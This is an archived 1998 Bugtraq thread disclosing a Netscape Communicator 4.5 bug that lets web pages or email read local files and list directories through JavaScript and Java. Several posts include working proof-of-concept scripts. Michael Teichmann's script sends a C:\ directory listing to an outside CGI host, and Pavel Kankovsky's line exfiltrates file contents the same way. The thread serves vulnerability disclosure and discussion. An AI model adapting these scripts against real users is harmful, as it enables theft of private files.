Lucene search
Packet StormPACKETSTORM:15236HistoryAug 17, 1999 - 12:00 a.m.
netscape4.5-read-dir.txt
1999-08-1700:00:00
Packet Storm
packetstormsecurity.com
39
`----------------------------------------------------------------
Date: Mon, 23 Nov 1998 10:36:40 PST
From: Georgi Guninski <[email protected]>
To: [email protected]
Subject: Netscape Communicator 4.5 can read local files
There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for
WinNT 4.0
(probably others) which allows reading files from the user's computer.
It is not necessary the file name to be known, because directories may
be browsed.
The contents of the file may be sent to an arbitrary host. In order this
to work, you need both Java and Javascript
enabled. The bug may be exploited by email message.
Demonstration is available at:
http://www.geocities.com/ResearchTriangle/1711/b6.html
Workaround: Disable Javascript or Java.
The Javascript code is:
sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";
Regards,
Georgi Guninski
http://www.geocities.com/ResearchTriangle/1711
----------------------------------------------------------------
Date: Mon, 23 Nov 1998 20:49:37 +0000
From: The Spirit of the Black Panther <[email protected]>
To: [email protected]
Subject: Re: Netscape Communicator 4.5 can read local files
I have just tested this bug in Netscape 4.5 on a RedHat Linux 5.1 machine,
Kermel 2.0.34 and with minor patching of the java, it is also effective. I
was sucessful in retrieving ANY LOCAL FILE with the World readable
attribute. This includes the /etc/passwd file! In netscape,
Edit>Preferences>Advanced>Disable Javascript in Mail and News will block
this exploit, unless the person has access to your web server.
----------------------------------------------------------------
Date: Tue, 24 Nov 1998 20:23:25 -0800
From: Ryan Russell <[email protected]>
To: [email protected]
Subject: Re: Netscape Communicator 4.5 can read local files
It's vastly different. Did you try creating c:\test.txt and putting
something in it, and going to that page? Notice that it pops
the first line in a dialog box. That means it has that info
under programmatic contol, and can send it across the network
back to the web server, exactly as claimed in the original
advisory.
Contrast that with (you) opening your c: drive with Communicator.
You can browse local files, but only you get to see the contents,
and that window isn't under any kind of programmatic control
>from other windows... at least that's how it's supposed to work.
It's similar to the Java sandbox concept. Local and signed
content are "trusted" and can do whatever they like, whereas
remotely loaded content are "untrusted" and aren't supposed
to be able to perform certain operations. When you (well,
Netscape and Microsoft) try to mix the two, invariably mistakes
will be made, and leaks will happen between the two.
Ryan
----------------------------------------------------------------
Date: Wed, 25 Nov 1998 17:19:41 +1300
From: Andrew McNaughton <[email protected]>
To: [email protected]
Subject: Re: Netscape Communicator 4.5 can read local files
The demonstration exploit puts your file on screen, but could as easily
have passed it back to the server the javascript came from. simply
replace alert(b) with appropriate code.
Andrew McNaughton
----------------------------------------------------------------
Trev ([email protected])
Mon, 23 Nov 1998 14:05:16 -0800
At 10:36 AM 11/23/98 PST, Georgi Guninski wrote:
>There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for
>WinNT 4.0
>(probably others)
FYI: It also works on 4.04 for Win95 but the opening of the new navigator
window is a dead giveaway, though it would be less suspicious to load the
directory listing into a mini frame with some actual content in the other.
I would guess you could code up some javascript to url encode the contents
of the file and send it to a malicious cgi that could read it from the
query string. There are no warnings given for information submitted via
the "get" method.
Trev
----------------------------------------------------------------
Pavel Kankovsky ([email protected])
Wed, 25 Nov 1998 20:13:13 +0100
On Wed, 25 Nov 1998, Ben Collins wrote:
> If some one here can setup a webpage, send me the URL, have that page read
> the file '/test.txt' from my hardrive and then that person send the
> contents to this list, I will believe. Otherwise I think this whole
> hysteria over 'unforseen' dangers should stop.
replace alert(b) with
w=window.open(\"some_url?\"+escape(b));
and make sure some_url points to a cgi script recording its $QUERY_STRING
(in fact, the text would be recorded in access_log as well)
BTW: it seems both Java and JavaScripts must be enabled
--Pavel Kankovsky aka Peak [ Boycott Czech Telecom--http://www.bojkot.cz ]
"spt Telecom... ted zdrazujeme zitrek!" [ Engl. lang. info-- .../english/ ]
----------------------------------------------------------------
Date: Wed, 25 Nov 1998 14:13:05 -0800
From: Trev <[email protected]>
To: [email protected]
Subject: Re: Netscape Communicator 4.5 can read local files
At 12:48 PM 11/25/98 -0500, Ben Collins wrote:
>If some one here can setup a webpage, send me the URL, have that page read
>the file '/test.txt' from my hardrive and then that person send the
>contents to this list, I will believe. Otherwise I think this whole
>hysteria over 'unforseen' dangers should stop.
I've whipped up a couple of demos of this bug that send the contents to a
cgi. There is a windows version that I know works, and a unix version I
can't test because my linux box is down (it's a hardware thing). This is
for anyone who has doubts....
http://www.kics.bc.ca/~trev/cgi-bin/test.html (Windoze)
http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html (UNIX)
And yes, it can email it to you if you like :)
Trev
----------------------------------------------------------------
Date: Wed, 25 Nov 1998 15:28:45 -0500
From: Terence Christopher Haddock <[email protected]>
Reply-To: [email protected]
To: [email protected]
Subject: Re: Netscape Communicator 4.5 can read local files
This security hole is not limited to knowing a specific file name,
it can be used to list the contents of a directory, which I believe is
much more insidious. This script can send a list of the files in the
user's root directory under windows:
sl=window.open("wysiwyg://1/file://C|/");
sl2=sl.window.open();
sl2.location="javascript:"+
"b=\"Here is the files in your root directory:\";"+
"var f=new java.io.file(\"C:\\\\\");"+
"var files=f.list();"+
"for (var x=0;x<files.length;x++){"+
"b+=files[x]+\"\n\""+
"};"+
"alert(b);";
(Simple to modify it for UNIX)
Using a search algorithm the script could search for specific
files by running this recursively. The only problem (from a hacker's
perspective, a good thing from our perspective) is all of the windows it
would open. If a way could be worked around this (which I think it can),
this script could run without a user even knowing it, searching the user's
directories and reporting them to a server.
Sincerely,
Terence C. Haddock
----------------------------------------------------------------
Terence Christopher Haddock ([email protected])
Wed, 25 Nov 1998 14:22:12 -0500
Ben Collin's file contains the text "this is really stupid.". He's
running an UNIX version of Netscape, so I had to modify the script.
Unfortunately, the following does not work under both UNIX and Windows:
sl=window.open("wysiwyg://1/file://");
It works under UNIX, but not under Windows. A simple check of the
OS would take care of the distinction, however, so that wouldn't slow any
would-be hackers down. Also, if they know their target, then they know
what kind of OS they're dealing with.
Sincerely,
Terence C. Haddock
University of Delaware
On Wed, 25 Nov 1998, Ben Collins wrote:
> I would just like to say that I find it hard to believe so much fuss has
> been made about this. It is clear that this is only a local 'trick' to
> look like it has gotten info. There used to be earlier versions of this
> where ppl would make a link to file:///C|/ and say they had your hardrive
> contents on their webpage, and now that java/javascript is involved
> everyone is freaking out over the same thing just done a litte more
> elaborately.
>
> If some one here can setup a webpage, send me the URL, have that page read
> the file '/test.txt' from my hardrive and then that person send the
> contents to this list, I will believe. Otherwise I think this whole
> hysteria over 'unforseen' dangers should stop.
>
> --
> ----- -- - -------- --------- ---- ------- ----- - - --- --------
> Ben Collins <[email protected]> Debian GNU/Linux
> UnixGroup Admin - Jordan Systems Inc. [email protected]
> ------ -- ----- - - ------- ------- -- The Choice of the GNU Generation
----------------------------------------------------------------
Date: Thu, 26 Nov 1998 12:31:35 +0100
From: Michael Teichmann <[email protected]>
To: [email protected]
Subject: Re: Netscape Communicator 4.5 can read local files
> I've whipped up a couple of demos of this bug that send the contents to a
> cgi. There is a windows version that I know works, and a unix version I
> can't test because my linux box is down (it's a hardware thing). This is
> for anyone who has doubts....
>
> http://www.kics.bc.ca/~trev/cgi-bin/test.html (Windoze)
>
> http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html (UNIX)
>
> And yes, it can email it to you if you like :)
And if you wish, it can even read your directory structure: (works for
Win, but Unix should be straightforward)
//slight change of Trev's script:
<SCRIPT>
alert("List your files in C:\\ and it will be sent to a cgi script.");
sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"\";var f = new
java.io.File(\"C:\\\\\\\\\"); var fl=f.list(); i=0; while(i < fl.length)
{b += fl[i]+\"\\\\n\";
i++;}w=window.open(\"http://www.kics.bc.ca/~trev/cgi-bin/query_string.cgi?\"+escape(b));</'+'SCRIPT>'";
</SCRIPT>
At least it seems it can not *write* to local files,
I get a security exception when I try that.
----------------------------------------------------------------
Date: Thu, 26 Nov 1998 17:43:31 +0100
From: Norbert Luckhardt <[email protected]>
To: [email protected]
Subject: Re: Netscape Communicator 4.5 can read local files
-----BEGIN PGP SIGNED MESSAGE-----
Hi there,
At 19:36 23.11.98 , you wrote:
>There is a bug in Netscape Communicator 4.5 for Windows 95
and 4.05 for
>WinNT 4.0 (probably others)
we just tried it on the Mac - surely the script has to be
adapted since the mac doesn't use drive letters - so if You
don't know the names of the drive you cannot give an
absolute path - but it could work with relative paths:
sl=window.open("wysiwyg://1/file:////");
those 4 slashes show the directory in which netscape is
installed (every extra slash goes one dir up)
it is at least possible to get files from that directory
with:
java.io.File(\"test.txt\")
alas I'm not so firm with JavaScript and thus I did not get
a working code with the quoting for higher dir levels -
earned only JavaScript Errors
but I think this is only my personal problem, isn't it?! ;-)
have fun, Shalom dann,
NOrbert
--
Norbert Luckhardt http://www.heise.de/ct/Redaktion/nl/
Redaktion c't Tel.: +49 511 5352 - 300 Fax: +49 511 5352 - 417
Helstorfer Str. 7 D-30625 Hannover BBS: +49 511 5352 - 301
`